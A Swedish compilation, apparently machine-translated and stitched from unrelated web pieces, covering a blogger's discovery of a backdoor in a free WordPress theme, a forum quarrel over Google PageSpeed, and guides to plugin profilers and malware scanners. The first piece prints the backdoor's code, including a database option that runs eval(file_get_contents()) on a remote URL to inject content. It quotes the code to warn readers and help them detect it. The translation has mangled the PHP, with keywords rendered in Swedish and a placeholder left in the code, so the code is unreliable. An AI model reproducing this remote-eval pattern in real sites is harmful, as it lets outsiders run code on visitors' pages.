Hej kompisar. Är du säker på att den gratis WordPress-mallen som du använder för dina webbplatser och bloggar är verkligen säker och inte innehåller dolda hot och skadlig kod? Är du helt säker på detta? Absolut?)
Du tror att de körde igenom mallen, tog bort dolda länkar från den och det är klart. Du skannar med jämna mellanrum webbplatsfilerna med ett antivirusprogram, tittar på Yandex webbansvariga på fliken Säkerhet och med lättnad ser du ett meddelande där: " Ingen skadlig kod hittades på webbplatsen«.
Så tänkte jag också. Jag vill inte göra dig upprörd, men...
Dold farlig kod i gratis WordPress-teman
Det här är brevet jag fick förra veckan med posten från min värd. Nyligen har de infört en regelbunden kontroll av alla webbplatsfiler för skadligt innehåll, och ändå hittade de detta innehåll i mig!
Allt började med det faktum att jag en dag gick till min sida och inte kunde starta den - en kränkande inskription om icke-hittade filer med php-tillägget kom ut. Efter att ha spänt mig lite gick jag för att studera innehållet i mappen med webbplatsen på webbhotellet och upptäckte omedelbart ett problem - min fuctions.php mallfil döptes om till functions.php.malware, vilket, så att säga, tvetydigt antydde - ett antivirus eller något liknande fungerade här) Efter att ha skrivit in mailet hittade jag ovanstående rapport från hostaren.
Först och främst började jag förstås kontrollera den här filen, studerade dess innehåll, skannade den med alla typer av antivirus, dussintals virusskanningstjänster online, etc. - Till slut hittade jag ingenting, alla hävdade enhälligt att filen var helt säker. Naturligtvis uttryckte jag mina tvivel till värden och sa att du förstörde något, men för säkerhets skull bad jag dem lämna en rapport om upptäckten av en skadlig kod.
Och detta är vad de sa till mig
Jag gick till google information om den här koden och funderade allvarligt på det ...
Hur man hittar en bit skadlig kod i en mall
Som det visade sig är detta ett riktigt icke-trivialt knep som låter intresserade parter överföra data till din webbplats och ändra innehållet på sidor utan din vetskap! Om du använder en gratis mall, då Jag rekommenderar starkt att du kontrollerar din functions.php för följande kod:
add_filter('the_content', '_blogginfo', 10001);
function _bloginfo($content)(
global $post;
if(är_singel() && ( [e-postskyddad](get_option('blogoption'))) !== false)(
returnera $co;
) annars returnerar $content;
}
Även med min mycket ytliga kunskap om php kan det ses att ett visst filter skapas som är knutet till den globala variabeln post och innehåll, som ansvarar för att visa innehåll endast på blogginläggssidor (is_single condition). Redan misstänkt är det inte? Nåväl, låt oss nu se vad den här koden kommer att visa på vår webbplats.
Det intressanta bloggalternativet som efterfrågas i databasen ser också väldigt suspekt ut. Vi går in i vår MySQL-databas och hittar en tabell där som heter wp_options, om du inte ändrade prefixen så kommer det se ut så här som standard. Och i den hittar vi en linje av intresse för oss som kallas blogoption
Vilken skönhet! Vi ser följande alternativ
return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
De där. oss från en viss sida (för övrigt ryska, märk väl) returnerar innehåll som kan innehålla vad som helst! Valfritt antal länkar, skadliga koder, ändrad text, etc. Webbplatsen själv, när den kommer åt den, ger ut ett 403 åtkomstfel, vilket inte är förvånande. Naturligtvis tog jag också bort det här alternativet från databasen.
Enligt informationen från offren, returneras exakt innehållet i din artikel vanligtvis med endast en modifiering - istället för någon punkt "." en öppen länk var maskerad i texten! Och förresten, det här alternativet skrivs till databasen när själva mallen är installerad, och sedan förstör koden som gör detta säkert själv. Och jag levde med sådant skräp i två år, och inte ett enda antivirus eller tjänst avslöjade detta hot för mig under hela den tiden. För att vara ärlig, märkte jag inte om den här tekniken någonsin fungerade för mig, eller om mitt säkerhetsplugin blockerade denna möjlighet (eller kanske en av WordPressa-uppdateringarna stängde det här hålet), men det är fortfarande obehagligt.
Moralen i den fria osten
Vad tycker du om sofistikeringen hos våra "översättare" av mallar (eller de som lägger upp dem i sina kataloger)? Det är inte för dig att klippa ut länkar från sidfoten) Det är synd att jag inte kommer ihåg var jag laddade ner min mall ifrån, det var länge sedan, annars hade jag skrivit ett par tillgivna. Och om jag vid den tiden hade samma erfarenhet som jag har nu, så skulle jag definitivt inte använda en gratis mall, eller, i extrema fall, inte ladda ner från okända källor!
Det är lättare att köpa någon officiell premiummall för 15-20 spänn på samma och leva i fred med vetskapen om att det inte finns några hål och krypterade länkar i den, och även om det finns sårbarheter kommer utvecklarna definitivt att släppa en uppdatering där dessa hålen kommer att stängas. ( Artem publicerade förresten nyligen en artikel där han bara pratar om premiummallar och till och med delar ut kampanjkoder för brutala rabatter för den som är intresserad)
-
Slösa inte ens din tid på googlefaker.
Googles verktyg kan, trots alla dess brister, göra saker som andra inte kan, som att upptäcka att bilder på en webbplats visas i fel storlek. det är när en 1000x1000 bild visas som en 100x100 miniatyr, komprimerad av webbläsaren till 100x100.
Jag reparerade bokstavligen häromdagen ett skevt ämne av klienten vid detta tillfälle. där visades miniatyrer 110 × 82 i sidofältet - men de ursprungliga bilderna i full storlek var fyllda där.
Plus, vilket annat verktyg kommer att visa dig att dina bilder är mycket ooptimerade? när en png-fil kan komprimeras från 500kb till 45kb utan kvalitetsförlust, är detta mycket viktig information.
Tja, varför tipsar du om dumheter igen?
och visa mig nu vilket annat verktyg som kan användas för att identifiera sådana uppenbara webbplatsstim?
https://i.imgur.com/tOZcemv.jpg
https://i.imgur.com/fEarWYT.jpg
och så vidare.. Jag hoppas att det räcker.Flector, Om du använde vanliga verktyg (och inte konsumerade olika Google-förfalskningar) - skulle dessa frågor helt enkelt inte existera.
Allt ovanstående ger information 3 storleksordningar högre och mer användbar än denna Google-falsk. Verkligen relevant och användbar information.Allt ovanstående ger information 3 storleksordningar högre och mer användbar än denna Google-falsk. Verkligen relevant och användbar information.
Jag gillar inte verktyget från Google, om så bara för att dess egna tjänster inte styrs av det. men han visar de uppenbara sakerna som bilder perfekt. tja, det finns också gzip, webbläsarcache etc. - det vill säga det mest uppenbara.
och jag föredrar att titta på Google, eftersom bara dess bedömning är viktig. vilken skillnad gör det vad tredjepartstjänster kommer att visa om Google fortfarande kommer att vägledas av sin egen bedömning?
Kontrollera din, var bilderna är felaktigt insatta. Vilka är problemen?
Jag lyckades knappt hitta något liknande för att ta skärmdumpar.eftersom endast hans bedömning är viktig.
Vem bryr sig? Säg bara inte så till Google 🙂
Och ja, en uppskattning. att få 100/100 är inga problem. Men för sajten är detta en katastrof.
Och ja, en uppskattning. få 100/100 - inga problem. Men för sajten är detta en katastrof.
Tja, du fick Google ett 503-fel, vad är poängen?
detta är inte en lösning på problemet.Och ja, Googles poäng är viktiga.
Jag vet inte hur mycket, de avslöjar inte sådana siffror - men det skulle vara dumt att göra en tjänst som ingenting beror på, eller hur?PS Ja, och även om Google inte bryr sig om sin egen bedömning - detta är först och främst nödvändigt för webmastern själv, och inte för Google. om webbmastern inte har gzip aktiverat, webbläsarens cachelagring och bilder inte har sin storlek, bör detta åtgärdas.
och det finns inget behov av att fixa det som Google inte anser är viktigt (jag pratar om betyg av andra tjänster) - det kommer bara att vara slöseri med tid.
Och ja, Googles poäng är viktiga.
Lär dig hur du analyserar utdata.
men det vore dumt att göra en tjänst som ingenting beror på, eller hur?
Jag ska berätta en hemsk hemlighet - Googles tjänster (och inte bara Google) har länge inte skapats för människor. Hur många tjänster från samma Google har sjunkit i glömska? Hur mycket var verkligen användbart och försvann sedan? Länge borta är de dagar då Google gjorde något för människor. Bigdata, ja.
detta är först och främst nödvändigt för webbmastern själv,
För en webbmaster finns det verkligen användbara och nödvändiga saker. Och det finns inget att slösa tid på olika skräp. (om du inte har märkt det - de visar också google papegojor)
vilken magisk ursäkt - lär dig att analysera frågan.
ok - jag ska också svara dig - lär dig att analysera frågan. allt annat lika (absolut samma rankningsfaktorer - från länkar till PF) kommer den första sidan i sökresultaten att vara den webbplats med högst betyg från Google.
tror inte? ja, du har rätt.
det fungerar fortfarande inte att testa detta - det finns inga likvärdiga webbplatser.i alla fall spelar det ingen roll - eftersom optimeringen inte görs så mycket för Google, utan för dina egna besökare. som med samma bilder, när webbmastern infogar en 5Mb bild som en miniatyr.
vad betyder det?
I "viktigheten" av Googleparrots.
vilken magisk ursäkt - lär dig att analysera frågan.
direkt argument för alla tillfällen.Säger man något om PS så är det utlämning som är det enda sanna beviset.
att testa detta kommer ändå inte att fungera - det finns inga likvärdiga webbplatser.
Och är de olika? Du kan inte ens kolla Google papegojor på webbplatser från emissionen? Där är 50 och till och med 30 ganska i TOP10.
det är bara en av tusentals rankningsfaktorer. det var därför jag pratade om "lika" (inte olika) sajter - bara i det här fallet kan du se till att Google-papegojorna fungerar.
Facebook kan ha en poäng på "0" för Google papegojor - men det kommer fortfarande att vara TOP1 för frågan "Facebook". det är typ självklart.
Google PageSpeed Insights har bara ett plus - en separat sökresultatanalys för desktop och mobil, annars är den dålig på samma sätt som en evigt missnöjd grinig fru )
Den är full av analoger, problemen med konfigurationsplatsen analyseras av många tjänster,
Jag gav medvetet ingen länk till Pingdom i början av ämnet, till exempel gillar jag Webpagetest mer, skillnaden ligger bara i hur resultatet presenteras och subjektiv bekvämlighet.
Många människor hittar också dåligt krympta bilder, frågan är bara, kasta av dig 10 papegojor och ge ut vad - bilderna på din sida är inte alls optimerade på grund av 1 byte skillnad ...
Ta samma GTMetrix, det finns en uppskattning för PageSpeedalgoritmen och Yslow,
dessutom kan en sida med 95% PageSpeed vara "botten" ooptimerad på Insights, detta är verkligen deras problem och de gör det till ett problem för andra, speciellt för de som inte kan analysera meningen med betygen och resultaten.
Sajten är bra, optimerad, men på G PS I - "åh, allt är dåligt"tror du verkligen att samma "google papegojor" är den viktigaste rankningsfaktorn i världen?
Jag tror att de är papegojor. De ger ingen användbar information. Och nedladdningshastigheten är inte alls i sidled (vilken typ av sidhastighet? Från själva namnet på tjänsten - en falsk). Hastigheten mäts inte i Google papegojor, utan i bps.
När det gäller rankning - om sajterna i TOP10 har 30 google papegojor, vad är då poängen med dem?
Något sådant.endast i det här fallet kan du vara säker på att Google Parrots fungerar.
Inte papegojor fungerar, utan alla faktorer. 90% av dem är inte i den här goofeyka, och 90% av vad som finns där är trams.
Den enda fördelen med det för lamerv är att du kan ladda ner optimerad grafik. Men bara grafik, inte stilar och skript.
- Ämnet "Kontrollera webbplatsen för fel" är stängt för nya svar.
Du kommer att lära dig, hur man kontrollerar belastningen installerad på webbplatsen wordpress. Med den här metoden kan du bestämma vilken plugin som ger en stor belastning på sajten, varefter denna plugin kan tas bort eller ersättas med någon annan.
Jag hade ett fall när ett plugin gav en stor belastning på servern och bloggen slutade fungera. Hostern skickade mig ett brev med en varning så att jag skulle ta hand om att minska belastningen och erbjöd sig som av en slump att byta till en dyrare taxa som lätt klarar av denna belastning. På den tiden hade jag en värd" sprithost". Åh, och jag led av detta värdskap.
Jag skrev för att stödja sprithost för att hjälpa mig att lösa det här problemet. Jag fick rådet att installera WP SuperCache". Ja, belastningen på servern minskade verkligen, men det räckte inte. Bloggen var ibland fortfarande inte tillgänglig. Jag löste detta problem helt enkelt. Jag bytte till en annan hosting, varefter alla laddningar försvann.
Så, låt oss börja. Oavsett hur paradoxalt det kan låta, men vi kommer att kontrollera laddningen av plugins med plugin " ».
Plugin "P3 - Plugin Performance Profiler" - kontrollerar laddningen av plugins på en WordPress-webbplats
Du kan ladda ner plugin från denna länk. Efter att ha installerat och aktiverat pluginet kan du klicka på länken " Skanna nu", som finns under namnet på själva plugin-programmet, eller gå till " Verktyg", och tryck sedan på " P3 Plugin Profiler».
Nu kan du skanna alla installerade plugins på din webbplats. Klick " Starta skanning". Ett fönster visas där du kan välja automatisk skanning ( automatisk skanning), eller manuell skanning ( Manuell skanning). I fältet " Skanna namn”, kan du ge den här skanningen ett namn, till exempel skriv datumet.
Om du väljer automatisk skanning ( automatisk skanning), sedan plugin " P3 - Plugin Performance Profiler» kommer automatiskt att skanna vissa sidor och mappar på webbplatsen. Med vilken princip den skannar är svårt att säga, men jag måste vänta cirka 10 minuter. Det färdiga resultatet kan du se om du trycker på knappen " Se Resultat". Följande diagram kommer att visas:
Grafen är uppdelad i delar av olika färger. Varje färg hänvisar till ett specifikt plugin, till exempel blå färg till plugin " WPtouch Mobile Plugin". För dig kan den här färgen referera till ett helt annat plugin.
Till höger i grafen kan du se vilken färg som hör till vilket plugin. Dessutom, om du flyttar muspekaren över själva diagrammet, till en viss färg, kommer du också att se vilken plugin färgen tillhör.
I mitt fall, plugin " Pretty Link Lite som jag nyligen skrev om. Du kan läsa ""
I manuellt skanningsläge kan du skanna vilken sida som helst på webbplatsen. Klick " Starta skanning", och då " Manuell skanning". Klicka på sidan du vill skanna och klicka sedan längst ned på " Jag är klar».
Färdiga resultat kan skickas till din E-post För att göra detta, klicka på länken nedan E-posta dessa resultat».
Ovanför diagrammet kan du se antalet installerade plugins på din webbplats, plugin-laddningstid, sidladdningstid och MySQL-databasfrågor. Du kan också se skanningshistoriken där. Historia) och få hjälp ( Hjälp).
____________________________
Till lektion 198.
Ett av de viktigaste stegen för att skapa en blogg är att välja en kvalitetsmall. Det finns många sajter, både betalda och gratis. Du måste dock vara försiktig här, eftersom det är stor sannolikhet att du får virus, skadliga skript och dolda länkar tillsammans med filen.
Men även om mallen är ren säkerhetsmässigt, och dess design, användbarhet och funktion passar dig helt, betyder det inte att allt är i sin ordning. Temat måste ha giltig HTML- och CSS-kod, samt uppfylla alla WordPress CMS-standarder.Även betalda teman och skräddarsydda mallar har problem med det senare.
Motorutvecklare utvecklar det hela tiden, och mallförfattare hänger inte alltid med i dem och använder föråldrade funktioner när de skapar dem.
Idag kommer jag att visa dig två sätt att kontrollera WordPress-teman för efterlevnad av standarder. Dessa verktyg används när de läggs till i den officiella katalogen https://wordpress.org/themes/
Tjänst för att kontrollera WordPress-teman och Joomla-mallar för överensstämmelse med standarder
ThemeCheck.org är en gratistjänst som låter dig kontrollera säkerheten och kvaliteten på WordPress- och Joomla CMS-mallar innan du installerar dem på din webbplats.
För att kontrollera ett tema laddar du upp dess arkiv från din dator genom att klicka på knappen "Välj fil" på webbplatsen themecheck.org. Om du inte vill att skanningsresultaten ska sparas på tjänsten och göras tillgängliga för andra användare, markera " Glöm uppladdade data efter resultat". Tryck nu på "Skicka"-knappen.
Jag tog till exempel ämnet Gränssnitt laddas ner från den officiella webbplatsen. 99 av 100 - 0 kritiska fel och 1 varning. Detta är ett mycket bra resultat.
Som jämförelse fick min bloggmall poängen 0 (14 fel och 23 varningar). Jag tror att för många kommer resultaten inte att skilja sig mycket, speciellt om ämnena redan är föråldrade. Alla kommentarer med förklaringar, som anger filerna och raderna där de hittades, finns på samma sida nedan.
Ärligt talat förstod jag inte mycket där, det kommer att vara mer användbart för författarna, och det är lättare för mig att ändra mallen än att fixa allt. Jag vet bara inte när jag hinner med det.
Home har ett stort urval av tidigare testade WordPress och Joomla webbteman med möjlighet att sortera efter tid som lagts till eller betygsatts. När du klickar på dem kan du se detaljerad information och länkar till författarens hemsida och nedladdningssida.
Om du är en utvecklare och ditt tema är 100 % giltigt, kan du informera användarna om det genom att sätta ett speciellt betygsmärke på det.
Värdet med tjänsten ThemeCheck.org är att alla webbansvariga kan använda den för att välja ett kvalitetstema redan innan det installeras på bloggen.
Theme Check Plugin
Du kan kontrollera en redan installerad mall för kompatibilitet med de senaste WordPress-standarderna med hjälp av Theme Check-plugin. Länk för att ladda ner den senaste versionen: https://wordpress.org/plugins/theme-check/
Funktionaliteten hos pluginet liknar tjänsten jag beskrev ovan. Det finns ingen anledning att göra några inställningar efter standardinstallationen och aktiveringen. Kontrollerar ordning:
- Gå till adminpanelen på menysidan "Utseende"-"Temakontroll“.
- Välj önskat tema från rullgardinsmenyn om det finns flera installerade.
- Markera rutan "Suppress INFO" om du inte vill skicka information.
- Klicka på knappen "Kontrollera det".
Resultaten kommer att visas på samma sida.
Som du kan se är standardtemat Tjugohundratioär inte heller idealiskt, men t.ex. Tjugo fjorton har inga fel.
Efter att ha kontrollerat pluginet kan du inaktivera det, och det är bättre att ta bort det helt och hållet till nästa gång.
Slutsats. Innan du installerar en ny WordPress-mall, kontrollera den inte bara för dolda länkar och skadlig kod med TAC-plugin, utan också med ThemeCheck.org-tjänsten eller Theme Check-plugin för överensstämmelse med de senaste CMS-standarderna.
P.S. När jag nyligen bläddrade i TopSape Reader såg jag en ny SEO-blogg zenpr.ru, som har 1:a plats bland bloggare när det gäller klick per månad. Med tanke på att hans ålder är drygt en månad är resultatet värt respekt. Design i stil med minimalism, om inte att säga att det inte existerar alls, men författaren skriver - du kommer att läsa det. All verksamhet och utan vatten. Precis som i rubriken på bloggen - "noll extra tecken." Jag rekommenderar att du läser, du kommer att hitta mycket användbar information.
Ofta frågar våra användare om det finns ett sätt att kontrollera deras WordPress-webbplats för potentiellt farlig kod. Svaret på denna fråga är: JA, JA och igen JA. Det finns både betalda och gratis verktyg för att skanna din WordPress-webbplats efter potentiellt farlig eller oönskad kod. Det är alltid en bra idé att göra regelbundna kontroller på din webbplats genom att skanna efter skadlig kod. I den här artikeln kommer vi att visa dig flera sätt att skanna din WordPress-webbplats efter potentiellt farlig kod.
Theme Authenticity Checker (TAC)
Theme Authenticity Checker är ett gratis plugin som kontrollerar alla dina WordPress-teman för potentiellt farlig eller oönskad kod.
Ofta siktar hackare på att hacka ämnen för att injicera länkar i dem, så en plugin är ett bra sätt att leta efter dem.
Utnyttja Scanner
Exploit Scanner är ett annat gratis WordPress-plugin som är kraftfullare än Theme Authenticity Checker eftersom det låter dig söka i alla filer och databaser i din WordPress-installation efter skadlig kod. Den letar efter signaturer som matchar skadlig kod och upptäcker dem.
Obs: Det kan finnas ett visst antal falska positiva resultat, så du måste förstå vad du gör och avgöra om det verkligen är skadlig programvara eller om allt är i sin ordning.
Sucuri
Sucuri är en av de BÄSTA säkerhetsskannrarna för WordPress i allmänhet. De har en enkel gratis webbplatsskanner som kontrollerar din resurs för att se om allt är i sin ordning med den. Den betalda versionen är dock vida överlägsen gratisversionen när det gäller dess möjligheter. Kort sagt, efter att du har installerat Sucuri övervakar den automatiskt din webbplats 24 timmar om dygnet, 7 dagar i veckan efter skadliga skript. Den granskar aktiviteten på hela webbplatsen för att meddela dig i tid om något går fel. Om något verkar misstänkt blockerar Sucuri IP:n. Insticksprogrammet skickar dig också ett meddelande om någon misstänkt aktivitet startar på webbplatsen. Och slutligen erbjuder plugin-programmet rensning av skadlig programvara, och denna tjänst ingår i priset för tjänsten (oavsett om din webbplats är stor eller liten).
För våra projekt har vi valt en plan för 5 sajter, vilket kostar cirka $3 per sida och månad. Det är vettigt att betala $3 per månad och inte oroa dig för webbplatsens säkerhet.
Tjänsten är förresten inte bara för nybörjare. Stora utgivare som CNN, USAToday, PC World, TechCrunch, TheNextWeb och andra använder Sucuri. Dessa killar vet vad de gör och det är därför folk litar på dem med sina webbplatser.
För alla frågor och feedback, skriv i kommentarerna nedan.
Glöm inte, om möjligt, att betygsätta dina favoritbidrag med antalet stjärnor efter eget gottfinnande.